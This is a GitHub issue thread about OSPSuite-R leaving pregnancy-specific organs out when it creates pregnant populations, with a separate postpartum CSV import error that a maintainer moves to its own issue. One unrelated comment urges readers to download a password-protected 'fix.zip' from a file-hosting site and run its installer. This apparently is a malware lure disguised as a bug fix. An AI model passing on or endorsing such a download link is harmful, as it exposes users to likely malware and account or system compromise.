### ISSUE TITLE
Creating pregnancy population should include pregnant-specific organs

### ISSUE THREAD

**Issue by PavelBal** [Open-Systems-Pharmacology/OSPSuite-R#1482]
When creating a pregnant population, the pregnancy-specific organs are not included

```
popChar <- createPopulationCharacteristics(species = "Human", population = HumanPopulation$Pregnant,
                                           numberOfIndividuals = 100)
pop <- createPopulation(populationCharacteristics = popChar)
```

Related to https://github.com/Open-Systems-Pharmacology/Pregnancy-Models/issues/28

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nina-nauwelaerts** [comment]
I have similar issues with the postpartum population. 

When I load the population from CSV file created in PK-Sim V11 this gives an error:

Error in do.call(".External", c(list("r_call_method", self$pointer, methodName), :
Type: OSPSuite.Utility.Exceptions.OSPSuiteException
Message: Error: The input string '10 individuals)' was not in a correct format.
Method: Void ThrowOnError()
Stack trace:
at OSPSuite.Infrastructure.Import.Services.ImportLogger.ThrowOnError()
at OSPSuite.R.Services.PopulationTask.ImportPopulation(String fileFullPath)
at InvokeStub_PopulationTask.ImportPopulation(Object, Span`1)
at System.Reflection.MethodBaseInvoker.InvokeWithOneArg(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)

However, when the population CSV file was created in PK-Sim V9.1 I do not receive any error.

**Comment by Yuri05** [comment]
> When creating a pregnant population, the pregnancy-specific organs are not included

followup of https://github.com/Open-Systems-Pharmacology/PK-Sim/issues/2865

**Comment by Yuri05** [comment]
> I have similar issues with the postpartum population.
> 
> When I load the population from CSV file created in PK-Sim V11 this gives an error:

This seems to be something different. I have extracted it into a separate issue:
https://github.com/Open-Systems-Pharmacology/OSPSuite-R/issues/1487
